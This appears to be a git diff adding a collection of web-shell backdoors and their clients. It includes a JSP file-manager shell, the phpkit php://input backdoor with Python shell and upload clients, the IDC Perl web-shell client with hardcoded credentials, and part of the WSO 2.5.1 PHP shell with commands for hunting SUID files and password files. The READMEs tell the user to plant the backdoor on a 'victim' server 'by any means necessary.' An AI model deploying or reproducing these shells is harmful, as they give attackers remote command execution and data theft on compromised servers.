");
+ sbFile.append(""+list[i].getName());
+ sbFile.append(" ");
+ sbFile.append(""+strLen);
+ sbFile.append(" ");
+ sbFile.append(""+strDT);
+ sbFile.append(" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileEdit[languageNo]+" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileDel[languageNo]+" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileDown[languageNo]+" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileCopy[languageNo]+" ");
+ }
+
+ }
+}
+catch(Exception e)
+{
+ out.println("??¡Á¡Â?¡ì¡ã??? "+e.toString()+" ");
+}
+%>
+
+
+
+
+
+
+
+
+
+
+
+
+http://www.WooYun.org/ ,All Rights Reserved.
+hahahaha <%String act="";String path=request.getParameter("path");String content=request.getParameter("content");String url=request.getRequestURI();String url2=request.getRealPath(request.getServletPath());try{act=request.getParameter("act").toString();}catch(Exception e){}if(request.getSession().getAttribute("hehe")!=null){if(request.getSession().getAttribute("hehe").toString().equals("hehe")){if (path!=null && !path.equals("") && content!=null && !content.equals("")){ try{ File newfile=new File(path); PrintWriter writer=new PrintWriter(newfile); writer.println(content); writer.close(); if (newfile.exists() && newfile.length()>0) { out.println("save ok! "); }else{ out.println("save erry! "); } }catch(Exception e) { e.printStackTrace(); }}out.println("");}}else{out.println("
");}if(act.equals("login")){ String pass=request.getParameter("pass"); if(pass.equals(password)) { session.setAttribute("hehe","hehe"); String uri=request.getRequestURI(); uri=uri.substring(uri.lastIndexOf("/")+1); response.sendRedirect(uri); }else {out.println("Error");out.println("go back " %(program)
+ print "Example: %s http://www.test.com/webshell.php" %(program)
+ sys.exit(0)
+
+def main(args):
+ try:
+ if len(args) < 2:
+ usage(args[0])
+
+ print "[+] Using %s as target" %(args[1])
+ print "[!] Popping a shell, type 'exit' to quit"
+ while True:
+ opener = urllib2.build_opener()
+ url = args[1]
+ cmd = raw_input('~$ ')
+ if cmd == "exit":
+ sys.exit(0)
+ else:
+ code = "system('%s');" %(cmd)
+ opener.addheaders.append(('Code', code))# %(str(code))
+ urllib2.install_opener(opener)
+ result = urllib2.urlopen(url).read()
+ print result
+ except Exception, e:
+ print e
+
+if __name__ == "__main__":
+ main(sys.argv)
diff --git a/php/php-sh/server.php b/php/php-sh/server.php
new file mode 100644
index 0000000..d62a899
--- /dev/null
+++ b/php/php-sh/server.php
@@ -0,0 +1,3 @@
+
diff --git a/php/phpkit-0.1a/README b/php/phpkit-0.1a/README
new file mode 100644
index 0000000..da0378b
--- /dev/null
+++ b/php/phpkit-0.1a/README
@@ -0,0 +1,53 @@
+ /$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
+| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
+| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
+| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
+| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
+| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
+| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
+|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
+
+phpkit-0.1a
+
+Stealth PHP Backdooring Utility - Insecurety Research 2013
+
+This is a simple kit to demonstrate a very effective way of
+backdooring a webserver running PHP.
+Essentially, it functions by parsing out any valid PHP code
+from raw HTTP POST data sent to it, and executing said PHP.
+
+No eval() or other suspect calls are in the serverside script,
+the code is executed by the include() function. The php://input
+data stream (which is basically "anything sent via raw POST) is
+used to "capture" the raw POST data, and when parsed by include()
+the code sent is executed.
+
+This allows for many things to be done, i.e. executing any PHP
+code you happen to write. The example client, phpkit.py, simply
+gives a "shell prompt" (non interactive, each command is executed
+in a new "context") on the victim server. It is trivial to write
+pretty much anything, I have also written "upload.py" which will
+be ready for the next release, which allows uploading arbritary
+files to the infected webserver.
+
+USAGE:
+You upload "odd.php" to the target webserver by any means necessary.
+You then run ./phpkit.py and enjoy!
+
+Example Use:
+[infodox@sphynx:~/phpkit-0.1a]$ ./phpkit.py http://localhost/odd.php
+
+[+] URL in use: http://localhost/odd.php
+
+shell:~$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+shell:~$ uname -a
+Linux yore-ma 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
+
+shell:~$
+
+Questions, comments, bug reports and abuse? infodox () insecurety.net
+
+Licence: The do whatever you want with it, just don't rip code without
+giving credit licence.
diff --git a/php/phpkit-0.1a/odd.php b/php/phpkit-0.1a/odd.php
new file mode 100644
index 0000000..b617988
--- /dev/null
+++ b/php/phpkit-0.1a/odd.php
@@ -0,0 +1,10 @@
+// php://input based backdoor
+// uses include('php://input') to execute arbritary code
+// Any valid PHP code sent as raw POST data to backdoor is ran
+// overrides the php.ini settings using ini_set :)
+// Insecurety Research 2013 | insecurety.net
+
diff --git a/php/phpkit-0.1a/phpkit.py b/php/phpkit-0.1a/phpkit.py
new file mode 100644
index 0000000..4f2a69a
--- /dev/null
+++ b/php/phpkit-0.1a/phpkit.py
@@ -0,0 +1,28 @@
+#!/usr/bin/python
+# Client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twitter: @info_dox
+# Insecurety Research - 2013
+import requests
+import sys
+
+if (len(sys.argv) != 2):
+ print "Usage: " + sys.argv[0] + " "
+ print "Example: " + sys.argv[0] + " http://localhost/odd.php"
+ sys.exit(0)
+
+url = sys.argv[1]
+print "\n[+] URL in use: %s \n" %(url)
+while True:
+ cmd = raw_input("shell:~$ ")
+ if cmd == "quit":
+ print "\n[-] Quitting"
+ sys.exit(0)
+ elif cmd == "exit":
+ print "\n[-] Quitting"
+ sys.exit(0)
+ else:
+ payload = """""" %(cmd)
+ hax = requests.post(url, payload)
+ print hax.text
diff --git a/php/phpkit-0.2a/CHANGELOG b/php/phpkit-0.2a/CHANGELOG
new file mode 100644
index 0000000..a7a97ef
--- /dev/null
+++ b/php/phpkit-0.2a/CHANGELOG
@@ -0,0 +1,10 @@
+Changelog of phpkit development
+--
+0.1a - 07/01 (Jan)/2013 - Initial Commit
+0.1b - 08/01 (Jan)/2013 - Major Upgrade. Now tests for system(), shell_exec() and passthru()
+ Uses simple logic to choose the first one that works.
+ Needs code cleanup soon, and implementation of exec() :)
+0.2a - 17/01 (Jan)/2013 - Realized I was still thinking it was January. Updated the client a bit.
+ Preparing for the 0.2a release by finishing the upload client and writing
+ documentation for it. Code is a lot cleaner now though. Still need to fix
+ the bloody "test" function :/
diff --git a/php/phpkit-0.2a/README b/php/phpkit-0.2a/README
new file mode 100644
index 0000000..930b56a
--- /dev/null
+++ b/php/phpkit-0.2a/README
@@ -0,0 +1,100 @@
+ /$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
+| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
+| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
+| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
+| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
+| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
+| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
+|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
+
+phpkit-0.2a
+
+Stealth PHP Backdooring Utility - Insecurety Research 2013
+
+This is a simple kit to demonstrate a very effective way of
+backdooring a webserver running PHP.
+Essentially, it functions by parsing out any valid PHP code
+from raw HTTP POST data sent to it, and executing said PHP.
+
+No eval() or other suspect calls are in the serverside script,
+the code is executed by the include() function. The php://input
+data stream (which is basically "anything sent via raw POST) is
+used to "capture" the raw POST data, and when parsed by include()
+the code sent is executed.
+
+This allows for many things to be done, i.e. executing any PHP
+code you happen to write. The example client, phpkit.py, simply
+gives a "shell prompt" (non interactive, each command is executed
+in a new "context") on the victim server. It is trivial to write
+pretty much anything.
+
+This release includes a massively overhauled backdoor client, it
+tests various execution functions against the victim host before
+using whatever one works first. It is massively ugly code, but
+I intend to clean it up soonish.
+
+This release also includes a basic file uploader :)
+
+USAGE (backdoor part):
+You upload "odd.php" to the target webserver by any means necessary.
+You then run ./phpkit.py and enjoy!
+
+Example Use:
+[infodox@sahara:~/phpkit]$ ./phpkit.py http://localhost/odd.php
+
+[+] URL in use: http://localhost/odd.php
+
+[+] Testing system function
+[+] system() function works
+shell:~$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+shell:~$ uname -a
+Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
+
+USAGE (file uploader part):
+This assumes "odd.php" is loaded onto the victim webserver, obviously.
+You run ./upload.py
+Only works if remote path is writeable. /tmp/ is always good :)
+
+Example Use:
+[infodox@sahara:~/phpkit]$ python upload.py http://localhost/odd.php /etc/passwd /tmp/pass
+[+] Uploading File
+[+] Upload should be complete
+
+So the file uploaded, now I compare MD5sums to check did it bloody well work!
+[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
+2568416e280af88f82e982efd46525a8 /etc/passwd
+[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
+2568416e280af88f82e982efd46525a8 /tmp/pass
+
+Seems legit bro ;)
+
+TODO:
+MySQL client.
+
+
+Notes:
+In two use-cases this was shown to not function.
+Use Case A: Servers with the Suhosin PHP Hardening Patches.
+In this case, php://input and other URL inclusion vectors are rendered
+unuseable due to the protections the Suhosin patches offer. i.e. this
+tool don't work against Suhosin patched boxes.
+
+Use Case B: Servers where php.ini is dictated by httpd.conf
+In several cases where the php.ini is specific to the HTTP daemon,
+runtime ini directive modification is not permissable. I have
+personally observed this behaviour on Apache thus far, however
+further testing/research is needed to find a workaround of some kind.
+
+Please report if you have any issues getting this to work. Please
+test it on a server with allow_url_include = On , then if it works,
+set allow_url_include = Off , restart httpd, and check does it work.
+If it does not work, please report using the issue tracker at
+http://code.google.com/p/insecurety-research providing details of HTTPD
+configuration so I can attempt to figure out new things :)
+
+Questions, comments, bug reports and abuse? infodox () insecurety.net
+
+Licence: The do whatever you want with it, just don't rip code without
+giving credit licence.
diff --git a/php/phpkit-0.2a/odd.php b/php/phpkit-0.2a/odd.php
new file mode 100644
index 0000000..b617988
--- /dev/null
+++ b/php/phpkit-0.2a/odd.php
@@ -0,0 +1,10 @@
+// php://input based backdoor
+// uses include('php://input') to execute arbritary code
+// Any valid PHP code sent as raw POST data to backdoor is ran
+// overrides the php.ini settings using ini_set :)
+// Insecurety Research 2013 | insecurety.net
+
diff --git a/php/phpkit-0.2a/phpkit.py b/php/phpkit-0.2a/phpkit.py
new file mode 100644
index 0000000..72fd3a2
--- /dev/null
+++ b/php/phpkit-0.2a/phpkit.py
@@ -0,0 +1,106 @@
+#!/usr/bin/python
+# Client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twatter: @info_dox
+# Insecurety Research - 2013
+# version: 0.2a
+
+import requests
+import sys
+
+if (len(sys.argv) != 2):
+ print "Usage: " + sys.argv[0] + " "
+ print "Example: " + sys.argv[0] + " http://localhost/odd.php"
+ sys.exit(0)
+
+url = sys.argv[1]
+tester = """echo w00tw00tw00t"""
+testkey = """w00tw00tw00t"""
+print "\n[+] URL in use: %s \n" %(url)
+
+### ###
+# Whole Bunch of Functions #
+### ###
+def genphp(func, cmd):
+ if func == "system":
+ rawphp = """system('%s');""" %(cmd)
+ elif func == "shellexec":
+ rawphp = """echo shell_exec('%s');""" %(cmd)
+ elif func == "passthru":
+ rawphp = """passthru('%s');""" %(cmd)
+ elif func == "exec":
+ rawphp = """echo exec('%s');""" %(cmd)
+ encodedphp = rawphp.encode('base64')
+ payload = """""" %(encodedphp)
+ return payload
+
+def test(url, tester, testkey): # This whole function is ugly as sin
+ print "[+] Testing system()" # I need to make it tighter
+ payload = genphp('system', tester) # No, really. Look at the waste
+ r = requests.post(url, payload) # It could be TIIINY and fast!
+ if testkey in r.text:
+ print "[+] system() works, using system."
+ func = 'system'
+ return func
+ else:
+ print "[-] system() seems disabled :("
+ pass
+ print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
+ payload = genphp('shellexec', tester) # THIS COULD BE TINY
+ r = requests.post(url, payload) # But. Coffee is lacking
+ if testkey in r.text:
+ print "[+] shell_exec() works, using shell_exec"
+ func = 'shellexec'
+ return func
+ else:
+ print "[-] shell_exec() seems disabled :("
+ pass
+ print "[+] Testing passthru()"
+ payload = genphp('passthru', tester)
+ r = requests.post(url, payload)
+ if testkey in r.text:
+ print "[+] passthru() works, using passthru"
+ func = 'passthru'
+ return func
+ else:
+ print "[-] passthru() seems disabled :("
+ pass
+ print "[+] Testing exec()"
+ payload = genphp('exec', tester)
+ r = requests.post(url, payload)
+ if testkey in r.text:
+ print "[+] exec() works, using exec"
+ func = 'exec'
+ return func
+ else:
+ print "[-] exec() seems disabled :("
+ pass
+
+### ###
+# End of functions and object oriented stuff #
+### ###
+
+# the main body
+func = test(url, tester, testkey)
+while True:
+ try:
+ cmd = raw_input("shell:~$ ")
+ if cmd == "quit":
+ print "\n[-] Quitting"
+ sys.exit(0)
+ elif cmd == "exit":
+ print "\n[-] Quitting"
+ sys.exit(0)
+ else:
+ try:
+ payload = genphp(func, cmd)
+ hax = requests.post(url, payload)
+ print hax.text
+ except Exception or KeyboardInterrupt:
+ print "[-] Exception Caught, I hope"
+ sys.exit(0)
+ except Exception or KeyboardInterrupt:
+ print "[-] Exception or CTRL+C Caught, I hope"
+ print "[-] Exiting (hopefully) cleanly..."
+ sys.exit(0)
diff --git a/php/phpkit-0.2a/upload.py b/php/phpkit-0.2a/upload.py
new file mode 100644
index 0000000..8074a5d
--- /dev/null
+++ b/php/phpkit-0.2a/upload.py
@@ -0,0 +1,34 @@
+#!/usr/bin/python
+# Upload.py
+# File Upload client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twatter: @info_dox
+# Insecurety Research - 2013
+# version: 0.2a
+import requests
+import sys
+
+if (len(sys.argv) != 4):
+ print "Usage: " + sys.argv[0] + " "
+ print "Example: " + sys.argv[0] + " http://localhost/odd.php reverseshell.py /tmp/rsh.py"
+ sys.exit(0)
+
+url = sys.argv[1]
+localfile = sys.argv[2]
+remotefile = sys.argv[3]
+
+f = open(localfile, "r")
+rawfiledata = f.read()
+encodedfiledata = rawfiledata.encode('base64')
+
+phppayload = """""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
+
+print "[+] Uploading File"
+requests.post(url, phppayload) # this is why I love the python requests library
+print "[+] Upload should be complete"
diff --git a/php/phpkit-1.0/README.txt b/php/phpkit-1.0/README.txt
new file mode 100644
index 0000000..1d48346
--- /dev/null
+++ b/php/phpkit-1.0/README.txt
@@ -0,0 +1,97 @@
+ /$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
+| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
+| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
+| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
+| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
+| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
+| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
+|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
+
+phpkit-1.0
+
+Stealth PHP Backdooring Utility - Insecurety Research 2013
+
+This is a simple kit to demonstrate a very effective way of
+backdooring a webserver running PHP.
+Essentially, it functions by parsing out any valid PHP code
+from raw HTTP POST data sent to it, and executing said PHP.
+
+No eval() or other suspect calls are in the serverside script,
+the code is executed by the include() function. The php://input
+data stream (which is basically "anything sent via raw POST) is
+used to "capture" the raw POST data, and when parsed by include()
+the code sent is executed.
+
+This allows for many things to be done, i.e. executing any PHP
+code you happen to write. The example client, phpkitcli.py, offers
+file upload and a remote shell.
+
+This release includes a massively overhauled backdoor client, it
+tests various execution functions against the victim host before
+using whatever one works first. It is massively ugly code, but
+I intend to clean it up soonish.
+
+USAGE (backdoor part):
+You upload "odd.php" to the target webserver by any means necessary.
+You then run ./phpkitcli.py --url and enjoy!
+
+Example Use:
+[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php
+
+[+] URL in use: http://localhost/odd.php
+
+[+] Testing system function
+[+] system() function works
+shell:~$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+shell:~$ uname -a
+Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
+
+USAGE (file uploader part):
+This assumes "odd.php" is loaded onto the victim webserver, obviously.
+You run:
+./phpkitcli.py --url --lfile --rfile --mode UPLOAD
+Only works if remote path is writeable. /tmp/ is always good :)
+
+Example Use:
+[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php --mode UPLOAD --lfile /etc/passwd --rfile /tmp/pass
+[+] Uploading File
+[+] Upload should be complete
+
+So the file uploaded, now I compare MD5sums to check did it bloody well work!
+[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
+2568416e280af88f82e982efd46525a8 /etc/passwd
+[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
+2568416e280af88f82e982efd46525a8 /tmp/pass
+
+Seems legit bro ;)
+
+TODO:
+MySQL client.
+
+
+Notes:
+In two use-cases this was shown to not function.
+Use Case A: Servers with the Suhosin PHP Hardening Patches.
+In this case, php://input and other URL inclusion vectors are rendered
+unuseable due to the protections the Suhosin patches offer. i.e. this
+tool don't work against Suhosin patched boxes.
+
+Use Case B: Servers where php.ini is dictated by httpd.conf
+In several cases where the php.ini is specific to the HTTP daemon,
+runtime ini directive modification is not permissable. I have
+personally observed this behaviour on Apache thus far, however
+further testing/research is needed to find a workaround of some kind.
+
+Please report if you have any issues getting this to work. Please
+test it on a server with allow_url_include = On , then if it works,
+set allow_url_include = Off , restart httpd, and check does it work.
+If it does not work, please report using the issue tracker at
+http://code.google.com/p/insecurety-research providing details of HTTPD
+configuration so I can attempt to figure out new things :)
+
+Questions, comments, bug reports and abuse? infodox () insecurety.net
+
+Licence: The do whatever you want with it, just don't rip code without
+giving credit licence.
diff --git a/php/phpkit-1.0/odd.php b/php/phpkit-1.0/odd.php
new file mode 100644
index 0000000..795e1af
--- /dev/null
+++ b/php/phpkit-1.0/odd.php
@@ -0,0 +1,5 @@
+
diff --git a/php/phpkit-1.0/phpkitcli.py b/php/phpkit-1.0/phpkitcli.py
new file mode 100644
index 0000000..764b9a9
--- /dev/null
+++ b/php/phpkit-1.0/phpkitcli.py
@@ -0,0 +1,132 @@
+#!/usr/bin/python
+import argparse
+import requests
+import sys
+
+help = """Connects to a phpkit backdoor and provides file upload or shell access"""
+parser = argparse.ArgumentParser(description=help)
+parser.add_argument("--url", help="URL of backdoor", required=True)
+parser.add_argument("--mode", help="UPLOAD or SHELL", default="SHELL")
+parser.add_argument("--lfile", help="File to Upload (full path)")
+parser.add_argument("--rfile", help="Where to put the file on the server (full path)")
+args = parser.parse_args()
+
+url = args.url
+mode = args.mode
+localfile = args.lfile
+remotefile = args.rfile
+
+tester = """echo w00tw00tw00t"""
+testkey = """w00tw00tw00t"""
+print "\n[+] URL in use: %s \n" %(url)
+
+### ###
+# Whole Bunch of Functions #
+### ###
+def genphp(func, cmd):
+ if func == "system":
+ rawphp = """system('%s');""" %(cmd)
+ elif func == "shellexec":
+ rawphp = """echo shell_exec('%s');""" %(cmd)
+ elif func == "passthru":
+ rawphp = """passthru('%s');""" %(cmd)
+ elif func == "exec":
+ rawphp = """echo exec('%s');""" %(cmd)
+ encodedphp = rawphp.encode('base64')
+ payload = """""" %(encodedphp)
+ return payload
+
+def test(url, tester, testkey): # This whole function is ugly as sin
+ print "[+] Testing system()" # I need to make it tighter
+ payload = genphp('system', tester) # No, really. Look at the waste
+ r = requests.post(url, payload) # It could be TIIINY and fast!
+ if testkey in r.text:
+ print "[+] system() works, using system."
+ func = 'system'
+ return func
+ else:
+ print "[-] system() seems disabled :("
+ pass
+ print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
+ payload = genphp('shellexec', tester) # THIS COULD BE TINY
+ r = requests.post(url, payload) # But. Coffee is lacking
+ if testkey in r.text:
+ print "[+] shell_exec() works, using shell_exec"
+ func = 'shellexec'
+ return func
+ else:
+ print "[-] shell_exec() seems disabled :("
+ pass
+ print "[+] Testing passthru()"
+ payload = genphp('passthru', tester)
+ r = requests.post(url, payload)
+ if testkey in r.text:
+ print "[+] passthru() works, using passthru"
+ func = 'passthru'
+ return func
+ else:
+ print "[-] passthru() seems disabled :("
+ pass
+ print "[+] Testing exec()"
+ payload = genphp('exec', tester)
+ r = requests.post(url, payload)
+ if testkey in r.text:
+ print "[+] exec() works, using exec"
+ func = 'exec'
+ return func
+ else:
+ print "[-] exec() seems disabled :("
+ pass
+
+###
+def shell(func):
+ func = test(url, tester, testkey)
+ while True:
+ try:
+ cmd = raw_input("shell:~$ ")
+ if cmd == "quit":
+ print "\n[-] Quitting"
+ sys.exit(0)
+ elif cmd == "exit":
+ print "\n[-] Quitting"
+ sys.exit(0)
+ else:
+ try:
+ payload = genphp(func, cmd)
+ hax = requests.post(url, payload)
+ print hax.text
+ except Exception or KeyboardInterrupt:
+ print "[-] Exception Caught, I hope"
+ sys.exit(0)
+ except Exception or KeyboardInterrupt:
+ print "[-] Exception or CTRL+C Caught, I hope"
+ print "[-] Exiting (hopefully) cleanly..."
+ sys.exit(0)
+
+def upload(url, localfile, remotefile):
+ f = open(localfile, "r")
+ rawfiledata = f.read()
+ encodedfiledata = rawfiledata.encode('base64')
+ phppayload = """""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
+
+ print "[+] Uploading File"
+ requests.post(url, phppayload) # this is why I love the python requests library
+ print "[+] Upload should be complete"
+ sys.exit(0)
+
+def main(url, localfile, remotefile, mode):
+ if mode == "UPLOAD":
+ upload(url, localfile, remotefile)
+ elif mode == "SHELL":
+ func = test(url, test, testkey)
+ shell(func)
+ else:
+ print "[-] Mode Invalid... Exit!"
+ sys.exit(0)
+
+main(url, localfile, remotefile, mode)
diff --git a/php/wsb/ReadMe.txt b/php/wsb/ReadMe.txt
new file mode 100644
index 0000000..330cf43
--- /dev/null
+++ b/php/wsb/ReadMe.txt
@@ -0,0 +1,7 @@
+#Web Shell BackDoor
+For using this tool you must follow this steps :
+1- Upload the php Agent (idc.php) into server
+2- Run the perl script (wsb.pl) on your machine
+3- Give the address of the agent to the perl script
+4- Using this username and password : user :root , pass : toor
+5- Enter Your Commands;)
diff --git a/php/wsb/idc.php b/php/wsb/idc.php
new file mode 100644
index 0000000..4e157fb
--- /dev/null
+++ b/php/wsb/idc.php
@@ -0,0 +1,7 @@
+
diff --git a/php/wsb/wsb.pl b/php/wsb/wsb.pl
new file mode 100644
index 0000000..851148c
--- /dev/null
+++ b/php/wsb/wsb.pl
@@ -0,0 +1,109 @@
+#IDC php BackDoor
+#Iranian Dark Coders Team
+#WwW.IDC-TeaM.NeT
+#Coded BY M.R.S.CO
+#We Are M.R.S.CO,N3O,UB313,Black.Hack3r
+#Friends : G3n3Rall,MR.CILILI,BlacK.King,Nafsh,b3hz4d,E2MA3N,Skote_Vahshat,Bl4ck.Viper,Mr.Xpr
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+print q (
+
+ __ __ __
+ | | _|_ {_ |_ _|| |__} _ _| | \ _ _ _
+ |/\|{-|_} __}| }{-|| |__}{_|{_|{|__/{_}{_}|
+
+ --=[Web Shell BackDoor]
+ +---++---==[Version : 1.1]
+ +---++---==[Coded by : M.R.S.CO]
+ +---++---==[WwW.IDC-TeaM.Net]
+ --=[Iranian Dark Coders Team]
+);
+use LWP::Simple;
+print "\nEnter Shell URL : ";
+chomp($url=);
+
+print "\nEnter UserName : ";
+chomp($usr=);
+
+print "Enter PassWord : ";
+chomp($pass=);
+
+
+print "\nStart analyze shell\n";
+@fun=("system","passthru","exec","shell_exec");
+$tf="false";
+foreach(@fun)
+{
+ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('echo www.idc-team.net');";
+ if ($source =~ m/idc-team/i){
+ print "\nConected\nFor more information Enter \"help\"";
+ do {
+ print "\nWSB : ";
+ chomp($cmd=);
+ if ($cmd=~"help")
+ {
+print q (
+================================================================
+
+ command Description
+ ------- --------------------------
+ help The help command display the help menu
+ getuid The 'getuid' command will display the user
+ lpwd display the filename of the current working directory
+ ps The 'ps' command display the list of running processes.
+ shell It display the standard shell
+ dir The 'dir' command List information about the FILEs
+ download The 'download' command downloads a file from the remote machine
+ sym The 'sym' command create a symlink
+);
+ }elsif ($cmd=~"getuid"){
+ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('id');";
+ print "\nUser id = $source";
+ }elsif ($cmd=~"dir"){
+ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ls -la');";
+ print "\n $source";
+ }elsif ($cmd=~"lpwd"){
+ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('pwd');";
+ print "\n$source";
+ }elsif ($cmd=~"ps"){
+ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ps -A');";
+ print "\n$source";
+ }elsif ($cmd=~"exit"){
+ exit 0;
+ }elsif ($cmd=~"sym"){
+ print "Enter Target Path (/home/idc/public_html/config.php)\nEnter Target Path : ";
+ chomp($target=);
+ print "\nEnter symlink Path (/home/me/public_html/sym.txt)\nEnter symlink Path : ";
+ chomp($sym=);
+ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ln -s $target $sym');";
+ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\'perl -e \"symlink('$target','$sym')\"\');";
+ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=symlink('$target','$sym');";
+ print "\nSymlink \"$sym\" Was Created;)\n";
+ }elsif ($cmd=~"download"){
+ print "Enter File Path (/home/idc/public_html/test.zip)\nEnter File Path : ";
+ chomp($ff=);
+ print "\nEnter Save Path : ";
+ chomp($fp=);
+ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('cat $ff');";
+ open (fdl, '>>'.$fp);
+ print fdl "$source";
+ close (fdl);
+ print "\File \"$ff\" Was Downloaded to $fp\n";
+ }elsif ($cmd=~"shell"){
+ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"uname -an\");";
+ print "\n$source";
+ do {
+ print "\ncmd : ";
+ chomp($cm=);
+ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"$cm\");";
+ print "\n$source";
+ if ($cm=~"exit"){goto ou;}
+ }while ($==1)
+ }else{
+ print "\"$cmd\" Command NotFound 404;) \nFor more information Enter \"help\"";
+ }
+ ou:;
+ }while ($==1)
+ }
+$tf="true";
+}
+if($tf="true") {print "Cant connect to server !!\n";}
diff --git a/php/wso2.5.1.php b/php/wso2.5.1.php
new file mode 100644
index 0000000..164921c
--- /dev/null
+++ b/php/wso2.5.1.php
@@ -0,0 +1,1522 @@
+");
+}
+
+function WSOsetcookie($k, $v) {
+ $_COOKIE[$k] = $v;
+ setcookie($k, $v);
+}
+
+if(!empty($auth_pass)) {
+ if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
+ WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
+
+ if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
+ wsoLogin();
+}
+
+if(strtolower(substr(PHP_OS,0,3)) == "win")
+ $os = 'win';
+else
+ $os = 'nix';
+
+$safe_mode = @ini_get('safe_mode');
+if(!$safe_mode)
+ error_reporting(0);
+
+$disable_functions = @ini_get('disable_functions');
+$home_cwd = @getcwd();
+if(isset($_POST['c']))
+ @chdir($_POST['c']);
+$cwd = @getcwd();
+if($os == 'win') {
+ $home_cwd = str_replace("\\", "/", $home_cwd);
+ $cwd = str_replace("\\", "/", $cwd);
+}
+if($cwd[strlen($cwd)-1] != '/')
+ $cwd .= '/';
+
+if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
+ $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
+
+if($os == 'win')
+ $aliases = array(
+ "List Directory" => "dir",
+ "Find index.php in current dir" => "dir /s /w /b index.php",
+ "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
+ "Show active connections" => "netstat -an",
+ "Show running services" => "net start",
+ "User accounts" => "net user",
+ "Show computers" => "net view",
+ "ARP Table" => "arp -a",
+ "IP Configuration" => "ipconfig /all"
+ );
+else
+ $aliases = array(
+ "List dir" => "ls -lha",
+ "list file attributes on a Linux second extended file system" => "lsattr -va",
+ "show opened ports" => "netstat -an | grep -i listen",
+ "process status" => "ps aux",
+ "Find" => "",
+ "find all suid" => "find / -type f -perm -04000 -ls",
+ "find suid in current dir" => "find . -type f -perm -04000 -ls",
+ "find all sgid" => "find / -type f -perm -02000 -ls",
+ "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
+ "find config.inc.php" => "find / -type f -name config.inc.php",
+ "find config*" => "find / -type f -name \"config*\"",
+ "find config* in current dir" => "find . -type f -name \"config*\"",
+ "find all writable folders and files" => "find / -perm -2 -ls",
+ "find all writable folders and files in current dir" => "find . -perm -2 -ls",
+ "find all service.pwd" => "find / -type f -name service.pwd",
+ "find service.pwd files in current dir" => "find . -type f -name service.pwd",
+ "find all .htpasswd" => "find / -type f -name .htpasswd",
+ "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
